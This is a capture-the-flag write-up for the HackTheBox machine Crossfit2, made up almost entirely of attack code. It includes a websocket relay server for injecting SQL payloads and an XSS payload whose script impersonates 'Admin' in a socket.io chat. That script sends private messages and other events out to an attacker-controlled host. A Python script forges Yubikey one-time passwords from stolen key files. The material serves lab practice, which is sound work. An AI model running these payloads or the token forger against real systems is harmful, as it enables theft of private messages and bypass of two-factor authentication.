DNS Rebinding, XSS & 2FA SSH - Crossfit2 @ HackTheBox
We are solving Crossfit2, a 50-point OpenBSD machine on HackTheBox.
Notes
Websocket Proxy
Author: https://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-automation.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from urllib.parse import unquote, urlparse
from websocket import create_connection
import json
import ssl
ws_server = "ws://gym.crossfit.htb/ws/"
def send_ws(payload):
ws = create_connection(ws_server)
resp = ws.recv()
token = json.loads(resp)['token']
message = unquote(payload).replace('"','\'')
data = '{"message":"available","params":"%s","token": "%s", "debug": 1}' % (message,token)
print(data)
ws.send(data)
resp = ws.recv()
#print(resp)
ws.close()
if resp:
return resp
else:
return ''
def middleware_server(host_port,content_type="text/plain"):
class CustomHandler(SimpleHTTPRequestHandler):
def do_GET(self) -> None:
self.send_response(200)
try:
payload = urlparse(self.path).query.split('=',1)[1]
except IndexError:
payload = False
if payload:
content = send_ws(payload)
else:
content = 'No parameters specified!'
self.send_header("Content-type", content_type)
self.end_headers()
self.wfile.write(content.encode())
return
class _TCPServer(TCPServer):
allow_reuse_address = True
httpd = _TCPServer(host_port, CustomHandler)
httpd.serve_forever()
print("[+] Starting MiddleWare Server")
print("[+] Send payloads in http://localhost:8080/?id=*")
try:
middleware_server(('0.0.0.0',8080))
except KeyboardInterrupt:
pass
XSS
password-reset.php
1
2
3
4
<html>
<script src="http://crossfit-club.htb/socket.io/socket.io.js"></script>
<script src="http://xemployees.crossfit.htb/xct.js"></script>
</html>
xct.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
function sendToMe(data) {
var xhr = new XMLHttpRequest()
xhr.open("GET","http://xemployees.crossfit.htb/?data="+data, false)
xhr.withCredentials = true
xhr.send()
}
socket = io("http://crossfit-club.htb")
socket.on("connect", () => {
sendToMe("id " + socket.id) // true
socket.emit("user_join",{username: "Admin"})
socket.emit("global_message", {sender_id: socket.id, content: "my global msg", roomId: "global"})
socket.emit("private_message", {sender_id: socket.id, content: "my private msg", roomId: 2})
});
socket.on("private_recv", e => {
sendToMe("PRIVATE: " + JSON.stringify(e))
});
socket.on("recv_global", e => {
sendToMe("Global: " + JSON.stringify(e))
});
socket.on("participants", e => {
sendToMe("Participants: " + JSON.stringify(e))
});
socket.on("new_user", e => {
sendToMe("New user: " + JSON.stringify(e))
});
socket.on("disconnect", e => {
sendToMe("Disconnect: " + JSON.stringify(e))
});
Yubikey
Author: macz
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
# Author: macz
from Crypto.Cipher import AES
from crccheck.crc import Crc16X25 # pip install crccheck
from pwn import *
from python_modhex.python_modhex import from_modhex, to_modhex # pip install python-modhex
key = unhex(open("root.key","r").read().strip())
kid = unhex(open("root.uid","r").read().strip())
ctr = int(open("root.ctr","r").read().strip())
ctr+= 0x100 # increment counter
with open('root.ctr', 'w') as f:
f.write(str(ctr))
# struct: uid + counter + timestamp_L + timestamp_H + session_use + random + crc
struct = kid + p16(ctr >> 8) + b'\x12\x34' + b'\x56' + p8(ctr & 0xFF) + b'\xab\xcd'
struct += p16(Crc16X25.calc([_ for _ in struct]))
aes = AES.new(key, AES.MODE_ECB)
print("Your token: " + to_modhex(enhex(aes.encrypt(struct))))
This post is licensed under CC BY 4.0 by the author.